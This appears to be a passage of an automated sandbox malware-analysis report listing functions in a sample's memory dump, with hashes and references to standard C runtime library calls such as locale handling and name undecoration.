Opcode Fuzzy Hash: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
Instruction Fuzzy Hash: AD91D4B1900209AFCF24DF58C886AFD7BB5AF08315F64A156F621F6192D7B49BC0CB54

Function 00E15B0C Relevance: 24.1, APIs: 16, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 00E15B25
__calloc_crt.LIBCMT ref: 00E15B49
_free.LIBCMT ref: 00E15B57
__calloc_crt.LIBCMT ref: 00E15B65
_free.LIBCMT ref: 00E15B75
_free.LIBCMT ref: 00E15B7B
__copytlocinfo_nolock.LIBCMT ref: 00E15B8A
__setlocale_nolock.LIBCMT ref: 00E15B97
___removelocaleref.LIBCMT ref: 00E15BA3
___freetlocinfo.LIBCMT ref: 00E15BAA
_free.LIBCMT ref: 00E15BB0
__setmbcp_nolock.LIBCMT ref: 00E15BC2
_free.LIBCMT ref: 00E15BD0
___removelocaleref.LIBCMT ref: 00E15BD7
___freetlocinfo.LIBCMT ref: 00E15BDE
_free.LIBCMT ref: 00E15BE4

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2193103758-0
Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction ID: 3517c787ab97b89e5cebb95f979b80020a6485e7778f09b2fb823567aa7868c2
Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction Fuzzy Hash: 0A21E537108A01EFD7257F29E802DCBBBE5EFC1750B20A02AF4957A1A1DE319DC08A55

Function 00E0C93A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnDecorator::getArgumentList.LIBCMT ref: 00E0C95F

Part of subcall function 00E0C4FA: Replicator::operator[].LIBCMT ref: 00E0C57D
Part of subcall function 00E0C4FA: DName::operator+=.LIBCMT ref: 00E0C585

DName::operator+.LIBCMT ref: 00E0C9B8
DName::DName.LIBCMT ref: 00E0CA10

Strings

D;C, xrefs: 00E0C9A4
8;C, xrefs: 00E0C9AB
4;C, xrefs: 00E0C9F3
(;C, xrefs: 00E0C9FA

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: (;C$4;C$8;C$D;C
API String ID: 834187326-2621726175
Opcode ID: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
Instruction ID: 58f869506f629371130fa01a59eb631c2e22c916adc780fe2308d82daa6100b1
Opcode Fuzzy Hash: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
Instruction Fuzzy Hash: CE21B330601248AFCB11DF5CD4449A97BF0FF4934EB64A255E846EB3A3EB30E982CB44

Function 00DCA5C8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 00DCA6E7
___TypeMatch.LIBVCRUNTIME ref: 00DCA7F5
CallUnexpected.LIBVCRUNTIME ref: 00DCA962

Strings

csm, xrefs: 00DCA605
csm, xrefs: 00DCA71E
csm, xrefs: 00DCA672

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: a3a4a3ca688090ebc1c50477757e456f54eb8fba265270a59f8dc84c2e48f4b7
Instruction ID: a7d95f9a58568d740aa9a24b9d2a7d1e0c6cc5adb6be5ee4217115b1aea62573
Opcode Fuzzy Hash: a3a4a3ca688090ebc1c50477757e456f54eb8fba265270a59f8dc84c2e48f4b7
Instruction Fuzzy Hash: 35B1357180021EABCF15DFA8C981EAEB7B5FF14318B19415EE8116B212D731DA52CFB2

Function 00DD5F4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,1539EB79,?,00DD6057,00DCC446,?,F8250000,00000000), ref: 00DD600B

Strings

ext-ms-, xrefs: 00DD5FB5
api-ms-, xrefs: 00DD5FA1

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c10ee2f41ffc457b15369a93bce8005854491d3ded299bd912251c523d7cf5ae
Instruction ID: d071fec1ad1713b89c9229c3c8cfb6d5dcb17a9e3db39d6c19a8a80e274384ff
Opcode Fuzzy Hash: c10ee2f41ffc457b15369a93bce8005854491d3ded299bd912251c523d7cf5ae
Instruction Fuzzy Hash: A621A836A01651ABC721AF75EC44A6E7758AF417A0B280126F915FF3D4DA30EE05C6F0

Function 00E0E2D3 Relevance: 10.6, APIs: 7, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 00E0E2DD
DName::DName.LIBCMT ref: 00E0E2E9

Part of subcall function 00E0BFB4: DName::doPchar.LIBCMT ref: 00E0BFE5

UnDecorator::getScopedName.LIBCMT ref: 00E0E328
DName::operator+=.LIBCMT ref: 00E0E332
DName::operator+=.LIBCMT ref: 00E0E341
DName::operator+=.LIBCMT ref: 00E0E34D
DName::operator+=.LIBCMT ref: 00E0E35A

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID:
API String ID: 1480779885-0
Opcode ID: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
Instruction ID: daa01ca7cb2f45d464693a729ac7ced3a62fdcfd6f497ec4f43891a190db4b92
Opcode Fuzzy Hash: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
Instruction Fuzzy Hash: 8711A071900208AFC709EB68C856AAD7FB0BF00305F4450A9E052FB3E2DB74AAC1CB51

Function 00DC3DB1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DC3DBD
int.LIBCPMT ref: 00DC3DD0

Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF

std::_Facet_Register.LIBCPMT ref: 00DC3E03
std::_Lockit::~_Lockit.LIBCPMT ref: 00DC3E19
Concurrency::cancel_current_task.LIBCPMT ref: 00DC3E24

Strings

G`, xrefs: 00DC3DC2, 00DC3E10

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: G`
API String ID: 2081738530-381365254
Opcode ID: 6d157ea9c9695c2c0e72d2abb28b617c00f890d47b4520e1568a23cc57747977
Instruction ID: 43bf20bbd432471ee0abd0c2f20ba0b8cad1de61768737cd96a46bd9ce2ccefe
Opcode Fuzzy Hash: 6d157ea9c9695c2c0e72d2abb28b617c00f890d47b4520e1568a23cc57747977
Instruction Fuzzy Hash: 3E01A276900126ABCB25AF54E805EAE7778DF81760B24425CF806A7292DB34EE02C7B0

Function 00DDF356 Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad009330fb7549d99f347d192814a72af6a115726ef35fee8a386523200f3c1
Instruction ID: 3c1b96ea925b49a655213708e1d6389981c26d55c92c6a2c1015f8c17eec47a5
Opcode Fuzzy Hash: 2ad009330fb7549d99f347d192814a72af6a115726ef35fee8a386523200f3c1
Instruction Fuzzy Hash: 11B1C274A00249AFDB15DFA9D880BAD7BB1EF45304F18416AE442AB3A2CB71DD42CF70

Function 00E102F3 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00E104E3

Part of subcall function 00E0C2B4: DName::doPchar.LIBCMT ref: 00E0C2DD

DName::DName.LIBCMT ref: 00E10573
DName::operator+.LIBCMT ref: 00E1057A
DName::DName.LIBCMT ref: 00E1059D
DName::operator+.LIBCMT ref: 00E105A4
DName::operator+=.LIBCMT ref: 00E105B0
DName::operator=.LIBCMT ref: 00E105D7
DName::operator+=.LIBCMT ref: 00E105E9
DName::operator=.LIBCMT ref: 00E105FD
UnDecorator::getPtrRefType.LIBCMT ref: 00E10612
operator+.LIBCMT ref: 00E10624

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction ID: a77113770ac9a3a517de3a17c1b326caa98720891800103be8c5bcbe0901de77
Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction Fuzzy Hash: 1421A1B6B0014A9ACF28DFBCC9459FCBBB5AB04308F506166E611F7581DEB09EC48F10

Function 00E102FD Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00E104E3

Part of subcall function 00E0C2B4: DName::doPchar.LIBCMT ref: 00E0C2DD

DName::DName.LIBCMT ref: 00E10573
DName::operator+.LIBCMT ref: 00E1057A
DName::DName.LIBCMT ref: 00E1059D
DName::operator+.LIBCMT ref: 00E105A4
DName::operator+=.LIBCMT ref: 00E105B0
DName::operator=.LIBCMT ref: 00E105D7
DName::operator+=.LIBCMT ref: 00E105E9
DName::operator=.LIBCMT ref: 00E105FD
UnDecorator::getPtrRefType.LIBCMT ref: 00E10612
operator+.LIBCMT ref: 00E10624

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction ID: 3066235daa5b24bb3ff68033b32ce10894c210776c3b70498301dd5bc479fa5b
Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction Fuzzy Hash: 6E219FB6B0014A9ACF28DFACC9459FC7BB6AB04308F506166A611F7581DEB09AC48E10

Function 00E10307 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00E104E3

Part of subcall function 00E0C2B4: DName::doPchar.LIBCMT ref: 00E0C2DD

DName::DName.LIBCMT ref: 00E10573
DName::operator+.LIBCMT ref: 00E1057A
DName::DName.LIBCMT ref: 00E1059D
DName::operator+.LIBCMT ref: 00E105A4
DName::operator+=.LIBCMT ref: 00E105B0
DName::operator=.LIBCMT ref: 00E105D7
DName::operator+=.LIBCMT ref: 00E105E9
DName::operator=.LIBCMT ref: 00E105FD
UnDecorator::getPtrRefType.LIBCMT ref: 00E10612
operator+.LIBCMT ref: 00E10624

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction ID: a9ded9b164151788f9b9a6ee44ac1ce13d16aa12f3e5bf130a023076067c3f9e
Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction Fuzzy Hash: 1121A1B6B0014A9ACF28DFBCC9459FC7BB6AB04309F506166E611F7581DEB09EC48F10

Function 00E10311 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00E104E3

Part of subcall function 00E0C2B4: DName::doPchar.LIBCMT ref: 00E0C2DD

DName::DName.LIBCMT ref: 00E10573
DName::operator+.LIBCMT ref: 00E1057A
DName::DName.LIBCMT ref: 00E1059D
DName::operator+.LIBCMT ref: 00E105A4
DName::operator+=.LIBCMT ref: 00E105B0
DName::operator=.LIBCMT ref: 00E105D7
DName::operator+=.LIBCMT ref: 00E105E9
DName::operator=.LIBCMT ref: 00E105FD
UnDecorator::getPtrRefType.LIBCMT ref: 00E10612
operator+.LIBCMT ref: 00E10624

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction ID: 649617d45315e8ca2009ea9baad6ee65b339f039684b9936e921ea710c54ff02
Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction Fuzzy Hash: 7421A1B6B0014A9ACF28DFBCD9459FC7BB6AB04308F506166E611F7581DEB49EC48F10

Function 00DC53B1 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00DC53B8
std::_Lockit::_Lockit.LIBCPMT ref: 00DC53C2
int.LIBCPMT ref: 00DC53D9

Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF

std::_Facet_Register.LIBCPMT ref: 00DC5413
std::_Lockit::~_Lockit.LIBCPMT ref: 00DC5433
Concurrency::cancel_current_task.LIBCPMT ref: 00DC5440

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 524fc862daab7660b3c588ace259969bdc7715fac08fbed745d8c249461d902b
Instruction ID: a63900f9363559d64b3887bf1843c46179a2d7abc69cff46e7a8589995689012
Opcode Fuzzy Hash: 524fc862daab7660b3c588ace259969bdc7715fac08fbed745d8c249461d902b
Instruction Fuzzy Hash: A811FD35910A2A8BCB14EB64E805BAE73B4EF44321F18010DF805A7385DF70AA418BB0

Function 00DCA25A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00DCA251,00DC8978,00DC7AFF), ref: 00DCA268
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DCA276
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DCA28F
SetLastError.KERNEL32(00000000,00DCA251,00DC8978,00DC7AFF), ref: 00DCA2E1

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3632433e352c635da1f55066d6de3149fd38335906e72f6c8b4a76db20f0f4dc
Instruction ID: ef92bb1af5a0a991b5db5b071bbfc71e5b33002777cccc92ce6270f148d9f298
Opcode Fuzzy Hash: 3632433e352c635da1f55066d6de3149fd38335906e72f6c8b4a76db20f0f4dc
Instruction Fuzzy Hash: 6201B53251D3676EA62437B87CC6F666746EB0277DB24022EF1108B1E1EF528D02517A

Function 00E14FA3 Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00E14EFA

Part of subcall function 00E0AD28: __mtinitlocknum.LIBCMT ref: 00E0AD3E
Part of subcall function 00E0AD28: __amsg_exit.LIBCMT ref: 00E0AD4A

_free.LIBCMT ref: 00E14F21
__lock.LIBCMT ref: 00E14F3A
___removelocaleref.LIBCMT ref: 00E14F49
___freetlocinfo.LIBCMT ref: 00E14F62
_free.LIBCMT ref: 00E14F7F

Memory Dump Source

Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 1181530324-0
Opcode ID: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
Instruction ID: 117dcb51b9369f2a586f21834e617b47eee04d668be0a6b73f71d15a096a5aab
Opcode Fuzzy Hash: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
Instruction Fuzzy Hash: C9119EB1605309AADB20AF689406B9D73E4AF08729F247529F0A4FB7D0CB34D9C1C661

Function 00DD0F50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1539EB79,?,?,00000000,00DE1FC8,000000FF,?,00DD0EE0,00DD1010,?,00DD0EB4,00000000), ref: 00DD0F85
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DD0F97
FreeLibrary.KERNEL32(00000000,?,?,00000000,00DE1FC8,000000FF,?,00DD0EE0,00DD1010,?,00DD0EB4,00000000), ref: 00DD0FB9

Strings

CorExitProcess, xrefs: 00DD0F8F
mscoree.dll, xrefs: 00DD0F7E

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
